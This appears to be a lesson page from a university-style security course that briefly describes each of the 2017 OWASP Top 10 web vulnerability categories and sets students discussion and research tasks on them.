The OWASP top 10
Understanding the common threats to our systems and applications helps us to identify elements that are likely to have flaws.
Important
These lists are meant for guicence. While they can tell us common areas where flaws may be found, and give us some idea of the risks. Focusing only on items in the list, means that other security issues may be missed.
One such list is the OWASP top 101 web vulnerabilities.
The OWASP Foundation has been compiling a list of what it classes as the most
prevalent web vulnerabilities since 2004.
The list is compiled by a panel of industry experts, based on analysis of
existing applications and known vulnerabilities.
The most recent version (2017) looked at over 50,000 applications, and 2.3 million vulnerblilites. These are then categorised and ranked according to the risk.
The vulnerabilities are judged on:
- Ease of Exploitability
- Prevalence
- Detectability
- Business Impact
Note
The numbering scheme may make it seem like a list of the most common attacks. However, its the risk related to this type of attack.
Its interesting to note that the Likelyhood of attack is not factored into the rating.
Looking at the OWASP top 10
In this section we will take a brief look at the top 10. You can find a more detailed report on the OWASP top 10 Document
-
Injection:
Including SQL, NoSQL, LDAP injection. This happens when malicios code is sent to the server as part of a command or query.
This may allow the attacker to execute commands on the server, or access data.
-
Broken Authentication:
Functions relaed to authentication and session handling are not implemented correctly.
This can allowing an attacker to compromise passwords, or session tokens and assume other users identities.
-
Sensitive Data Exposure
Where the web application does not protect sensitive information. For example, making other users data visable with a modified request. Other risks include not enxrypting data when it is stored, or transmitted across the network.
-
XML External Entities
Some XML parsers will allow you to execute code within the XML files, or access other data on the server.
-
Broken Access Control
Where restrictions on user privileges are not proplerly enfoced. This means that an attacker can access files or data that their privileges should deny.
-
Security Misconfiguration
Where insecure site or library configurations are used. This may be the result of insecure default configs, leaving insecure options turned on, or mistakes in the config settings.
-
Cross Site Scripting.
XSS attacks are where untrusted user-supplied data is dislpayed in a web-page. This can allow an attacker to execute scripts in the victims browser.
-
Insecure Deserialization.
Where components that deal with accepting and processing user-supplied data (such as JSON files) are insecure. This can commonly lead to Remote code execution on the server, but also Injection, or XSS style attacks
-
Using Components with Known Vulnerabilities.
Applications or API's with known vulnerblities can lead to any of the above attacks occuring. This becomes more important when we realise that new vulnerblities can be discovered in components after we choose to use them.
-
Insufficient Logging and Monitoring.
While this may not directly lead to the application being comprimised. We saw in week 3, that audit is vital to understanding and responding to attacks.
Script Kiddies #ScriptKiddies
Several of the vulnerablitites have been around since the first release of the OWASP Top 10. Others (Such as SQLi) are well known issues, and easily exploitable using tools downloaded from the web.
- Are there any of the Top 10 that surprise you?
- Why do you think that well known vulnerabilities are still in the top 10?
Post in the Feed on Aula using the tag #ScriptKiddies
OWASP top 10 #OSASP
Pick one of the OWSAP top 10, and research it in more detail.
- How does this issue occur
- Give an Real world Example of this issue
Post in the Feed on Aula using the tag #OWASP